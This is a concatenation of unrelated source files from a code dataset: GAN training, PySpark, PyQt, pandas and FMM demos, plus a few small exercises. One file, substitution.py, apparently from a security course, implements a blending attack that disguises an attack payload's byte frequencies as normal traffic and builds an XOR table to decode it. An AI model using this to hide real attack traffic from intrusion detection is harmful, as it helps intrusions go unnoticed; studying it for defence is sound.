'wgan-lp':\r\n GP = self.ld * tf.reduce_mean(tf.square(tf.maximum(0.0, grad_norm - 1.)))\r\n\r\n elif self.gan_type == 'wgan-gp' or self.gan_type == 'dragan':\r\n GP = self.ld * tf.reduce_mean(tf.square(grad_norm - 1.))\r\n\r\n return GP\r\n\r\n def discriminator_loss(self, loss_func, real, fake):\r\n real_loss = 0\r\n fake_loss = 0\r\n\r\n if loss_func.__contains__('wgan') :\r\n real_loss = -tf.reduce_mean(real)\r\n fake_loss = tf.reduce_mean(fake)\r\n\r\n if loss_func == 'lsgan' :\r\n real_loss = tf.reduce_mean(tf.squared_difference(real, 1.0))\r\n fake_loss = tf.reduce_mean(tf.square(fake))\r\n\r\n if loss_func == 'gan' or loss_func == 'dragan' :\r\n real_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.ones_like(real), logits=real))\r\n fake_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.zeros_like(fake), logits=fake))\r\n\r\n if loss_func == 'hinge' :\r\n real_loss = tf.reduce_mean(relu(1.0 - real))\r\n fake_loss = tf.reduce_mean(relu(1.0 + fake))\r\n\r\n loss = real_loss + fake_loss\r\n\r\n return loss\r\n\r\n def generator_loss(self, loss_func, fake):\r\n fake_loss = 0\r\n\r\n if loss_func.__contains__('wgan') :\r\n fake_loss = -tf.reduce_mean(fake)\r\n\r\n if loss_func == 'lsgan' :\r\n fake_loss = tf.reduce_mean(tf.squared_difference(fake, 1.0))\r\n\r\n if loss_func == 'gan' or loss_func == 'dragan' :\r\n fake_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.ones_like(fake), logits=fake))\r\n\r\n if loss_func == 'hinge' :\r\n fake_loss = -tf.reduce_mean(fake)\r\n\r\n loss = fake_loss\r\n\r\n return loss\r\n\r\n def build_model(self):\r\n self.inputs = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.ch], name='real_image')\r\n self.z = tf.placeholder(tf.float32, [self.batch_size, self.z_dim], name='z')\r\n\r\n real_logits = self.discriminator(self.inputs)\r\n\r\n fake_images = self.generator(self.z)\r\n fake_logits = self.discriminator(fake_images, reuse=True)\r\n\r\n if self.gan_type.__contains__('wgan') or self.gan_type == 'dragan' :\r\n GP = self.gradient_penalty(real=self.inputs, fake=fake_images)\r\n else :\r\n GP = 0\r\n\r\n # get loss for discriminator\r\n self.d_loss = self.discriminator_loss(self.gan_type, real=real_logits, fake=fake_logits) + GP\r\n\r\n # get loss for generator\r\n self.g_loss = self.generator_loss(self.gan_type, fake=fake_logits)\r\n\r\n \"\"\" Training \"\"\"\r\n # divide trainable variables into a group for D and a group for G\r\n t_vars = tf.trainable_variables()\r\n d_vars = [var for var in t_vars if 'discriminator' in var.name]\r\n g_vars = [var for var in t_vars if 'generator' in var.name]\r\n\r\n # optimizers\r\n self.d_optim = tf.train.AdamOptimizer(self.d_lr, beta1=self.beta1, beta2=self.beta2).minimize(self.d_loss, var_list=d_vars)\r\n self.g_optim = tf.train.AdamOptimizer(self.g_lr, beta1=self.beta1, beta2=self.beta2).minimize(self.g_loss, var_list=g_vars)\r\n\r\n \"\"\"\" Testing \"\"\"\r\n # for test\r\n self.fake_images = self.generator(self.z, is_training=False, reuse=True)\r\n\r\n \"\"\" Summary \"\"\"\r\n self.d_sum = tf.summary.scalar(\"d_loss\", self.d_loss)\r\n self.g_sum = tf.summary.scalar(\"g_loss\", self.g_loss)\r\n\r\n\r\n ############################################################################\r\n # Train\r\n ############################################################################\r\n\r\n def train(self):\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n self.sample_z = np.random.uniform(0, 1, size=(self.batch_size, self.z_dim))\r\n\r\n self.saver = tf.train.Saver()\r\n\r\n self.writer = tf.summary.FileWriter(self.log_dir + '/' + self.model_dir, self.sess.graph)\r\n\r\n # The number of training iterations\r\n iteration = self.data_num // self.batch_size\r\n\r\n # restore ckpt is it exits\r\n could_load, ckpt_counter = self.load(self.ckpt_dir)\r\n if could_load:\r\n start_epoch = ckpt_counter // iteration\r\n start_batch_id = ckpt_counter - start_epoch * iteration\r\n counter = ckpt_counter\r\n print('[*] ckpt exist. Start learning from the continuation.')\r\n else:\r\n start_epoch = 0\r\n start_batch_id = 0\r\n counter = 1\r\n print('[*] ckpt not exist. Start learning from the beginning.')\r\n\r\n past_g_loss = -1.0\r\n for epoch in range(start_epoch, self.epoch):\r\n for idx in range(start_batch_id, iteration):\r\n start_time = time.time()\r\n\r\n # batch inputs\r\n mask = np.random.choice(self.data_num, size=self.batch_size, replace=False)\r\n filename_batch = self.data_filenames[mask]\r\n image_batch = np.empty((self.batch_size, self.image_size, self.image_size, self.ch), dtype=np.uint8)\r\n for i_no, bf in enumerate(filename_batch):\r\n img = cv2.imread(bf)\r\n img = cv2.resize(img, (self.image_size, self.image_size))\r\n img = img.astype(np.float32) / 127.5 - 1.0\r\n\r\n image_batch[i_no] = img\r\n\r\n z_batch = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))\r\n\r\n train_feed_dict = {self.inputs: image_batch, self.z: z_batch}\r\n\r\n # update D network\r\n _, summary_str, d_loss = self.sess.run([self.d_optim, self.d_sum, self.d_loss], feed_dict=train_feed_dict)\r\n self.writer.add_summary(summary_str, counter)\r\n\r\n # update G network\r\n g_loss = None\r\n if(counter - 1) % self.n_critic == 0:\r\n _, summary_str, g_loss = self.sess.run([self.g_optim, self.g_sum, self.g_loss], feed_dict=train_feed_dict)\r\n self.writer.add_summary(summary_str, counter)\r\n past_g_loss = g_loss\r\n\r\n # display training status\r\n counter += 1\r\n if g_loss == None:\r\n g_loss = past_g_loss\r\n print('epoch: [{: 02}] [{:04} / {:04}], time: {:6.3f}, d_loss: {: 8.3f}, g_loss: {: 8.3f}'\r\n .format(epoch, idx, iteration, time.time() - start_time, d_loss, g_loss))\r\n\r\n # save training results for every self.image_save_freq steps\r\n if (idx+1) % self.image_save_freq == 0:\r\n samples = self.sess.run(self.fake_images, feed_dict={self.z: self.sample_z})\r\n tot_num_samples = min(self.sample_num, self.batch_size)\r\n manifold_h = int(np.floor(np.sqrt(tot_num_samples)))\r\n manifold_w = int(np.floor(np.sqrt(tot_num_samples)))\r\n save_images(samples[:manifold_h * manifold_w, :, :, :],\r\n [manifold_h, manifold_w],\r\n './' + self.sample_dir + '/' + self.model_name + '_train_{:02d}_{:04d}.png'.format(epoch, idx+1))\r\n\r\n if (idx+1) % self.model_save_freq == 0:\r\n self.save(self.ckpt_dir, counter)\r\n\r\n # After an epoch, start_batch_id is set to zero\r\n # non-zero value is only for the first epoch after loading pre-trained model\r\n start_batch_id = 0\r\n\r\n # save model\r\n self.save(self.ckpt_dir, counter)\r\n\r\n # show temporal results\r\n # self.visualize_results(epoch)\r\n\r\n # save model for final step\r\n self.save(self.ckpt_dir, counter)\r\n\r\n def visualize_results(self, epoch):\r\n tot_num_samples = min(self.sample_num, self.batch_size)\r\n image_frame_dim = int(np.floor(np.sqrt(tot_num_samples)))\r\n\r\n \"\"\" random condition, random noise \"\"\"\r\n\r\n z_sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))\r\n\r\n samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample})\r\n\r\n save_images(samples[:image_frame_dim * image_frame_dim, :, :, :], [image_frame_dim, image_frame_dim],\r\n self.sample_dir + '/' + self.model_name + '_epoch%02d' % epoch + '_visualize.png')\r\n\r\n\r\n ############################################################################\r\n # Test\r\n ############################################################################\r\n\r\n def test(self):\r\n tf.global_variables_initializer().run()\r\n\r\n self.saver = tf.train.Saver()\r\n could_load, ckpt_counter = self.load(self.ckpt_dir)\r\n result_dir = os.path.join(self.result_dir, self.model_dir)\r\n check_folder(result_dir)\r\n\r\n if could_load:\r\n print(\"[*] Load SUCCESS\")\r\n else:\r\n print(\"[!] Load failed...\")\r\n\r\n tot_num_samples = min(self.sample_num, self.batch_size)\r\n image_frame_dim = int(np.floor(np.sqrt(tot_num_samples)))\r\n\r\n \"\"\" random condition, random noise \"\"\"\r\n\r\n for i in range(self.test_num) :\r\n z_sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))\r\n\r\n samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample})\r\n\r\n save_images(samples[:image_frame_dim * image_frame_dim, :, :, :],\r\n [image_frame_dim, image_frame_dim],\r\n result_dir + '/' + self.model_name + '_test_{}.png'.format(i))\r\n\r\n\r\n @property\r\n def model_dir(self):\r\n return \"{}_{}_{}_{}_{}_{}\".format(\r\n self.model_name, self.gan_type, self.dataset, self.image_size, self.z_dim, self.layer_num)\r\n\r\n def save(self, ckpt_dir, step):\r\n ckpt_dir = os.path.join(ckpt_dir, self.model_dir)\r\n\r\n if not os.path.exists(ckpt_dir):\r\n os.makedirs(ckpt_dir)\r\n\r\n self.saver.save(self.sess, os.path.join(ckpt_dir, self.model_name+'.model'), global_step=step)\r\n\r\n def load(self, ckpt_dir):\r\n import re\r\n print(\"[*] Reading ckpts...\")\r\n ckpt_dir = os.path.join(ckpt_dir, self.model_dir)\r\n\r\n ckpt = tf.train.get_checkpoint_state(ckpt_dir)\r\n if ckpt and ckpt.get_checkpoint_state:\r\n ckpt_name = os.path.basename(ckpt.model_ckpt_path)\r\n self.saver.restore(self.sess, os.path.join(ckpt_dir, ckpt_name))\r\n counter = int(next(re.finditer(\"(\\d+)(?!.*\\d)\",ckpt_name)).group(0))\r\n print(\"[*] Success to read {}\".format(ckpt_name))\r\n return True, counter\r\n else:\r\n print(\"[*] Failed to find a ckpt\")\r\n return False, 0\r\n","sub_path":"Self-Attention-GAN-temp/SAGAN.py","file_name":"SAGAN.py","file_ext":"py","file_size_in_byte":17019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"434985155","text":"def permutation():\r\n count = 0\r\n words = str(input(\"enter the word \\n\"))\r\n print(len(words))\r\n b = [words[i] for i in range(0,len(words),1)]\r\n q = len(b)\r\n vowels = ['a','e','i','o','u']\r\n for i in range(len(b)):\r\n for j in range(len(vowels)):\r\n if (b[i] == vowels[j]):\r\n print(\"found\")\r\n count = count+1\r\n print(\"total no of commom word \",count)\r\n sp = q-count\r\n t_sp = sp+1\r\n sp_ct = t_sp - count\r\n print(\"total space\",t_sp)\r\n \r\n else:\r\n print(\"aborted...............\")\r\n \r\n if t_sp ==0:\r\n return \"no space\"\r\n \r\n else:\r\n fact_sp = 1\r\n for k in range(1,t_sp + 1):\r\n if t_sp == 0:\r\n print(\"only one way\")\r\n else:\r\n fact_sp = fact_sp*k\r\n print(fact_sp)\r\n \r\n \r\n \r\n fact_sp_ct = 1\r\n \r\n for l in range(1,sp_ct+1):\r\n \r\n sp_ct = t_sp - count\r\n if sp_ct<0:\r\n print(\"not enough space\")\r\n elif sp_ct == 0:\r\n print(\"word cannot be form\")\r\n else:\r\n fact_sp_ct = fact_sp_ct * l \r\n print(\"sp - ct.........=\",fact_sp_ct)\r\n \r\n \r\n rem_wd= len(words)- count\r\n fact_rem_wd = 1\r\n print(rem_wd)\r\n for m in range(1,rem_wd+1):\r\n fact_rem_wd = fact_rem_wd*m\r\n print(\"no... of remaining word fectorial is.....\\n \",fact_rem_wd)\r\n \r\n \r\n tot_way= (fact_sp/fact_sp_ct)*fact_rem_wd\r\n return tot_way\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"permutation_of_words.py","file_name":"permutation_of_words.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163761930","text":"#Ne pas oublier de changer le module à importer\nmodule=\"Les_conditions/Calcul_volume\"\n\nimport sys\nimport io\nfrom ma_bao import *\ntester(\"from Calcul_volume import volume \",globals())\n\ndef f_sol(L,l,h):\n return L*l*h\n \n#liste des couples input/output\ninput_output=[(0,0,0),(1,1,1),(1,9,5),(9,1,5),(0.5,1.5,2.5)]\n\n\n#message d'aide si besoin\nhelp=\"N'oublie pas d'utiliser return pour afficher le resultat\"\n\n#Afficher la correction\ndef afficher_correction():\n try:\n with open(module+\"_Correction.py\", \"r\") as correction :\n ligne=\"Voici un ou des exemples de corrections possibles\"\n send_msg(\"Exemple(s) de correction\", ligne)\n ligne=\"-------------------------------------------------\"\n send_msg(\"Exemple(s) de correction\", ligne)\n lignes=correction.read().split(\"\\n\")\n for ligne in lignes:\n send_msg(\"Exemple(s) de correction\", ligne)\n except:\n pass\n\ndef send_msg(channel, msg):\n print(\"TECHIO> message --channel \\\"{}\\\" \\\"{}\\\"\".format(channel, msg))\n\n\ndef success():\n send_msg(\"Tests validés\",\"Bravo !\")\n afficher_correction()\n print(\"TECHIO> success true\")\n\n\ndef fail():\n print(\"TECHIO> success false\")\n \n\ndef test():\n try:\n for inp in input_output:\n outp=f_sol(*inp)\n count1=volume(*inp)\n assert str(count1) == str(outp), \"En testant les valeurs {} le résultat obtenu est {} au lieu de {}\".format(str(inp),str(count1),str(outp))\n send_msg(\"Tests validés\",\"En testant les valeurs {} le résultat obtenu est bien {}\".format(str(inp),str(count1)))\n success()\n except AssertionError as e:\n fail()\n send_msg(\"Oops! \", e)\n if help:\n send_msg(\"Aide 💡\", help)\n\n\nif __name__ == \"__main__\": test()\n","sub_path":"python-project/Les_fonctions/Calcul_volume_Test.py","file_name":"Calcul_volume_Test.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"25507941","text":"'''jupyterで\b実行している'''\n\n#%%\n# DataFrameの作成\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.appName('Python Spark SQL basic example').config('spark.some.config.option', 'some-value').getOrCreate()\ndf = spark.read.json('../../spark-2.4.0-bin-hadoop2.7/examples/src/main/resources/people.json')\ndf.show()\n#%%\n# DataFrameの操作\ndf.printSchema()\ndf.select('name').show()\ndf.select(df['name'], df['age'] + 1).show()\ndf.filter(df['age'] > 21).show()\ndf.groupBy('age').count().show()\n\n#%%\n# SQL\ndf.createOrReplaceTempView('people')\n\nsql_df = spark.sql('select * from people')\nsql_df.show()\n\n#%%\n# RDDからDataFrameへ変換\n# 1.Reflectionを用いてスキーマの推論\nfrom pyspark.sql import Row\n\nsc = spark.sparkContext\n\nlines = sc.textFile('../../spark-2.4.0-bin-hadoop2.7/examples/src/main/resources/people.txt')\nparts = lines.map(lambda l: l.split(','))\npeople = parts.map(lambda p: Row(name=p[0], age=int(p[1])))\n\nschema_people = spark.createDataFrame(people)\nschema_people.createOrReplaceTempView('people')\n\nteenagers = spark.sql('select name from people where age >= 13 and age <= 19')\nteennames = teenagers.rdd.map(lambda p: 'Name: ' + p.name).collect()\nfor name in teennames:\n print(name)\n\n#%%\n# 2.スキーマの指定\nfrom pyspark.sql.types import *\n\nsc = spark.sparkContext\n\nlines = sc.textFile('../../spark-2.4.0-bin-hadoop2.7/examples/src/main/resources/people.txt')\nparts = lines.map(lambda l: l.split(','))\npeople = parts.map(lambda p: (p[0], p[1].strip()))\n\nschema_string = 'name age'\nfields = [StructField(field_name, StringType(), True) for field_name in schema_string.split()]\nschema = StructType(fields)\n\nschema_people = spark.createDataFrame(people, schema).show()\n","sub_path":"spark_sql.py","file_name":"spark_sql.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269564321","text":"from numpy import int32\r\nfrom os import path\r\nfrom utils.time_utils import CurrentDateTime\r\nfrom initializing import DataFrameStrategy, ComandLineProcessor_Excel, notifier\r\nimport pandas as pd\r\n\r\n#Change the location for the following folders.\r\noutput_folder = r\"####\"\r\ninput_folder = r\"####\"\r\nhistory_folder = r\"######\"\r\n\r\ndef main():\r\n\tcurrent_dt = CurrentDateTime()\r\n\tcomand_line_processor = ComandLineProcessor_Excel(input_folder, history_folder)\r\n\tdf_strategy = DataFrameStrategy(pd, comand_line_processor)\r\n\traw_df = df_strategy.intitialize_data_frame()\r\n\tdf = clean_data_frame(raw_df)\r\n\tdf_columns_added = add_required_columns(df, current_dt)\r\n\tdf_formatted = apply_format(df_columns_added)\r\n\toutput_to_csv(df_formatted, current_dt)\r\n\tdf_strategy.finalize()\r\n\r\n\r\ndef clean_data_frame(input_df):\r\n\traw_df = input_df.copy()\r\n\traw_df = raw_df.convert_dtypes()\r\n\traw_df[\"Buffer\"] = raw_df[\"Buffer\"].map(lambda k: 0.0 if k ==\"буфер 0\" else k)\r\n\traw_df = raw_df[[\"SKU\", \"Buffer\"]]\r\n\tdf = raw_df.dropna()\t\r\n\tdf.reset_index(drop=True, inplace=True)\r\n\treturn df\r\n\t\r\n\r\ndef add_required_columns(input_df, current_dt: CurrentDateTime):\r\n\tdf = input_df.copy()\r\n\tdf[\"0-Name\"] = \"Buf_Manual_{0} {1} {2} {3}\".format(current_dt.month_name(),\r\n\t\t\t\t\t\t\t\tcurrent_dt.day(), \r\n\t\t\t\t\t\t\t\tcurrent_dt.year(), \r\n\t\t\t\t\t\t\t\tcurrent_dt.time()\r\n\t)\r\n\tdf[\"1-Location\"] = \"006\"\r\n\tdf[\"3-Null\"] = \"null\"\r\n\tdf[\"4\"] = \"buffer\"\r\n\tdf[\"5-yr1\"] = current_dt.year()\r\n\tdf[\"6-month1\"] = current_dt.month()\r\n\tdf[\"7-day1\"] = current_dt.day()\r\n\tdf[\"8-yr2\"] = current_dt.year()\r\n\tdf[\"9-month2\"] = current_dt.month()\r\n\tdf[\"10-day2\"] = current_dt.day()\r\n\tdf[\"11\"] = 1\r\n\tdf[\"13-Value\"] = \"FixedValue\"\r\n\tdf[\"14\"] = 1\r\n\tdf[\"15\"] = \"Approved\"\r\n\tvalues = [\" \" for i in range(1, 11)] + [current_dt.year(),\r\n\t\t\t\t\tcurrent_dt.month(), current_dt.day()]\r\n\tfor i in range(len(values)):\r\n\t\tdf[f\"{16 + i}\"] = values[i]\r\n\treturn df\r\n\r\n@notifier(\"Dataframe finished the formatting and processing phases. Outputting to csv.\")\r\ndef apply_format(input_df):\r\n\tdf = input_df.copy()\r\n\tdf = df[[\"0-Name\", \"1-Location\", \"SKU\", \"3-Null\", \"4\", '5-yr1',\r\n\t\t'6-month1', '7-day1', '8-yr2', '9-month2', '10-day2', '11', \"Buffer\", '13-Value', '14', '15',\r\n\t\t'16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28']]\r\n\tdf = df.astype({\"Buffer\": int32})\r\n\treturn df\r\n\r\n@notifier(\"Success, the csv is created.\")\r\ndef output_to_csv(formated_df, current_dt: CurrentDateTime):\r\n\tdate_format, time_format = current_dt.output_format_dd_tt()\r\n\toutput_name = \"SEASONALITY_Calculate_Buffers_Manual{0}_{1}.csv\".format(date_format, time_format)\r\n\toutput_name = path.join(output_folder, output_name) \r\n\tformated_df.to_csv(output_name, sep=\"|\", index=False, header=False)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()","sub_path":"formatter/formatter_app.py","file_name":"formatter_app.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"319403180","text":"#!/usr/bin/env python2\nimport struct\nimport math\nimport dpkt\nimport socket\nimport numpy as np\nfrom collections import Counter\nfrom frequency import *\n\ndef substitute(attack_payload, substitution_table):\n # Using the substitution table you generated to encrypt attack payload\n # Note that you also need to generate a xor_table which will be used to decrypt the attack_payload\n # i.e. (encrypted attack payload) XOR (xor_table) = (original attack payload)\n b_attack_payload = bytearray(attack_payload)\n result = []\n xor_table = []\n # Based on your implementattion of substitution table, please prepare result and xor_table as output\n \n # For each byte in attack payload,\n for byte_in_att in b_attack_payload:\n\n print(byte_in_att)\n # Get the list for the character from the substition table\n char_temp = chr(byte_in_att)\n char_list = substitution_table[char_temp]\n \n # If the list is only one character, \n if len(char_list) == 1:\n # Substitute that single character in\n char_chosen = char_list[0][0]\n # Otherwise, choose one character at random from the list\n else:\n # By first going through each choice in list\n chars_to_select = []\n chars_freqs = []\n for char_choice in char_list:\n # And adding it to an array \n chars_to_select.append(char_choice[0])\n # and add its frequency to a list\n chars_freqs.append(char_choice[1])\n\n # Spread the frequencies between 1 (e.g. 0.1, 0.3 and 0.4 would go\n # 0.125, 0.375 and 0.5)\n # First add up all of the frequecies\n total = 0\n for next in chars_freqs:\n total += next\n # then multiply each item by 1/total\n for cnt in range(0,len(chars_freqs)):\n chars_freqs[cnt] = chars_freqs[cnt] * (1/total)\n\n # Then choose one letter at random, based on the frequency\n char_chosen = np.random.choice(chars_to_select, p=chars_freqs)\n \n # add it to the result.\n result.append(char_chosen)\n\n # Create a XOR table\n\n table_cnt = 0\n \n # For each character in the substitution table i.e. Find a list and then\n # loop through the list...\n for att_repl_char, sub_list in substitution_table.iteritems():\n for sub_char_tup in sub_list: \n\n # Loop, increasing a counter, until result is found - brute force!\n found = False\n xor_cnt = 0\n while found == False:\n # If correct result found, finish the loop\n # i.e. if the current counter XOR next substitution character == the\n # attack character...\n print(\"sub_char_tup[0] = \" + str(ord(sub_char_tup[0])))\n print(\"att_repl_char = \" + str(ord(att_repl_char)))\n print(\"result = \" + str(xor_cnt ^ ord(sub_char_tup[0])))\n res = xor_cnt ^ ord(sub_char_tup[0])\n #xor_cnt += 1\n if res == ord(att_repl_char):\n found = True\n # else continue the loop\n else:\n xor_cnt += 1\n\n # Add result to XOR table\n xor_table.append(xor_cnt)\n table_cnt += 1\n print(\"XOR Table\")\n print(xor_table)\n input(\"...\")\n\n return (xor_table, result)\n\ndef getSubstitutionTable(artificial_payload, attack_payload):\n # You will need to generate a substitution table which can be used to encrypt the attack body by replacing the most frequent byte in attack body by the most frequent byte in artificial profile one by one\n\n # Note that the frequency for each byte is provided below in dictionay format. Please check frequency.py for more details\n artificial_frequency = frequency(artificial_payload)\n attack_frequency = frequency(attack_payload)\n\n sorted_artificial_frequency = sorting(artificial_frequency)\n sorted_attack_frequency = sorting(attack_frequency)\n\n # Your code here ...\n \n # Create an empty dictionary for the substitute table whose keys are \n # characters and who values are list of tuples. The list of tuples \n # are characters with floats.\n substitution_table = {}\n \n # Copy each character into the substitute table keys from the sorted \n # attack frequency data structure.\n for char_tup in sorted_attack_frequency:\n substitution_table[char_tup[0]] = []\n\n # For the first m characters, and first n, (Using m and n as a tuples here)\n for m, n in zip(sorted_attack_frequency, sorted_artificial_frequency):\n # Map attack characters to normal characters.\n substitution_table[m[0]] = [n] \n\n print(\"-----------------------\")\n #substitution_table['!'].append(('b',0))\n print(substitution_table) \n # Create counter for size of m to go to size of n\n m_plus_n_cnt = len(substitution_table)\n\n # Create a temporary table of all of the character left from the \n # artificial table\n chars_left =[]\n\n for cnt in range(m_plus_n_cnt, len(sorted_artificial_frequency)):\n chars_left.append(sorted_artificial_frequency[cnt])\n \n \n # For each of the m+nth characters in the artificial table:\n for art_char in chars_left:\n # Hold the largest of the substitute table subsub ratios\n highest_ratio = 0 \n # ... and it's character tuple\n highest_ratio_char = ()\n \n # For each of the characters in the substition table\n for att_char in sorted_attack_frequency:\n sub_sub_total = 0\n sub_ratio = 0\n\n # For each of the tuples in the substituion table character list\n for subst_char in substitution_table[att_char[0]]:\n sub_sub_total += subst_char[1]\n \n # Now create the ratio of current subst table char and compare it\n # with the highest. If higher, set as new\n sub_ratio = att_char[1] / sub_sub_total\n print(\"sub_ratio = \" + str(sub_ratio))\n print(\"highest Ratio = \" + str(highest_ratio))\n\n if sub_ratio > highest_ratio: \n highest_ratio = sub_ratio\n highest_ratio_char = att_char\n print(\"rat = \" + str(sub_ratio))\n \n substitution_table[highest_ratio_char[0]].append(art_char)\n print(\"substitution_table = \")\n print(substitution_table)\n \n # You may implement substitution table in your way. Just make sure it can be used in substitute(attack_payload, subsitution_table)\n return substitution_table\n\ndef getAttackBodyPayload(path):\n f = open(path)\n pcap = dpkt.pcap.Reader(f)\n for ts, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n if socket.inet_ntoa(ip.dst) == \"192.150.11.111\": # TASK: Add in the destination address for your attack payload in quotes\n tcp = ip.data\n if tcp.data == \"\":\n continue\n return tcp.data.rstrip()\n\ndef getArtificialPayload(path):\n f = open(path)\n pcap = dpkt.pcap.Reader(f)\n for ts, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n if tcp.sport == 80 and len(tcp.data) > 0:\n return tcp.data\n","sub_path":"substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9679519","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPainter, QBrush, QPixmap, QLinearGradient, QRadialGradient, QConicalGradient\nfrom PyQt5.QtWidgets import QApplication, QWidget\n\n\nclass Demo(QWidget):\n def __init__(self):\n super(Demo, self).__init__()\n self.resize(600, 600)\n\n self.brush1 = QBrush(Qt.SolidPattern) # 1\n\n self.brush2 = QBrush(Qt.Dense6Pattern) # 2\n self.brush2.setColor(Qt.red)\n\n gradient1 = QLinearGradient(200, 200, 300, 300) # 3\n gradient1.setColorAt(0.2, Qt.red)\n gradient1.setColorAt(0.8, Qt.green)\n gradient1.setColorAt(1, Qt.blue)\n self.brush3 = QBrush(gradient1)\n\n gradient2 = QRadialGradient(350, 350, 50, 350, 350) # 4\n gradient2.setColorAt(0, Qt.red)\n gradient2.setColorAt(1, Qt.blue)\n self.brush4 = QBrush(gradient2)\n\n gradient3 = QConicalGradient(450, 450, 90) # 5\n gradient3.setColorAt(0, Qt.red)\n gradient3.setColorAt(1, Qt.blue)\n self.brush5 = QBrush(gradient3)\n\n self.brush6 = QBrush(Qt.TexturePattern) # 6\n self.brush6.setTexture(QPixmap('images/smile.png'))\n\n def paintEvent(self, QPaintEvent):\n painter = QPainter(self)\n painter.setBrush(self.brush1) # 7\n painter.drawRect(0, 0, 100, 100)\n\n painter.setBrush(self.brush2)\n painter.drawRect(100, 100, 100, 100)\n\n painter.setBrush(self.brush3)\n painter.drawRect(200, 200, 100, 100)\n\n painter.setBrush(self.brush4)\n painter.drawRect(300, 300, 100, 100)\n\n painter.setBrush(self.brush5)\n painter.drawRect(400, 400, 100, 100)\n\n painter.setBrush(self.brush6)\n painter.drawRect(500, 500, 100, 100)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n sys.exit(app.exec_())","sub_path":"assembly/0427/explore_qt/31/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"376100281","text":"import pykifmm2d\nimport pykifmm2d.class_fmm as fmm\nimport numpy as np\nimport numba\nimport time\nimport os\n\n\"\"\"\nDemonstration of the FMM for the Helmholtz Kernel\n\nIf N <= 50000, will do a direct sum and compare to this\nOtherwise, will try to call FMMLIB2D through pyfmmlib2d\nTo compare to\nIf this fails, no comparison for correctness!\n\nOn my macbook pro N=50,000 takes the direct method ~7s, the FMM <1s\n(with N_equiv=64, N_cutoff=500)\nAnd gives error <5e-14\n\"\"\"\n\ncpu_num = int(os.cpu_count()/2)\n\nrandom2 = pykifmm2d.utils.random2\nPrepare_Functions_OTF = fmm.prepare_numba_functions_on_the_fly\nPrepare_K_Functions = fmm.Get_Kernel_Functions\n\n# Helmholtz Kernel\nfrom fast_interp import chebyshev_function_generator\nCFG = chebyshev_function_generator.ChebyshevFunctionGenerator\n\nfrom scipy.special import hankel1\n_h0 = CFG(lambda x: hankel1(0, x), 1e-30, 2000, tol=1e-14, n=32, verbose=False)\nh0 = _h0.get_base_function()\n\nhelmholtz_k = 2.0\n\n@numba.njit(fastmath=True)\ndef Eval(sx, sy, tx, ty):\n return h0(helmholtz_k*np.sqrt((tx-sx)**2 + (ty-sy)**2))*0.25j\n\n# associated kernel evaluation functions\nkernel_functions = Prepare_K_Functions(Eval)\n(KF, KA, KAS) = kernel_functions\n# jit compile internal numba functions\nnumba_functions_otf = Prepare_Functions_OTF (Eval)\n# numba_functions_plan = Prepare_Functions_PLAN(Laplace_Eval)\n\nN_source = 1000*10\nN_target = 1000*1000*10\ntest = 'circle' # clustered or circle or uniform\n\n# construct some data to run FMM on\nif test == 'uniform':\n px = np.random.rand(N_source)\n py = np.random.rand(N_source)\n rx = np.random.rand(N_target)\n ry = np.random.rand(N_target)\nelif test == 'clustered':\n N_clusters = 10\n N_per_cluster = int((N_source / N_clusters))\n N_random = N_source - N_clusters*N_per_cluster\n center_clusters_x, center_clusters_y = random2(N_clusters, -99, 99)\n px, py = random2(N_source, -1, 1)\n px[:N_random] *= 100\n py[:N_random] *= 100\n px[N_random:] += np.repeat(center_clusters_x, N_per_cluster)\n py[N_random:] += np.repeat(center_clusters_y, N_per_cluster)\n px /= 100\n py /= 100\n rx = np.random.rand(N_target)\n ry = np.random.rand(N_target)\nelif test == 'circle':\n rand_theta = np.random.rand(N_source)*2*np.pi\n px = np.cos(rand_theta)\n py = np.sin(rand_theta)\n rx = np.random.rand(N_target)*2 - 1\n ry = np.random.rand(N_target)*2 - 1\nelse:\n raise Exception('Test is not defined')\n\n# maximum number of points in each leaf of tree for FMM\nN_cutoff = 50\n# number of points used in Check/Equivalent Surfaces\nN_equiv = 48\n\n# get random density\ntau = (np.random.rand(N_source))\n\nprint('\\nHelmholtz FMM with', N_source, 'source pts and', N_target, 'target pts.')\n\n# get reference solution\nreference = True\nif reference:\n if N_source*N_target <= 10000**2:\n # by Direct Sum\n st = time.time()\n self_reference_eval = 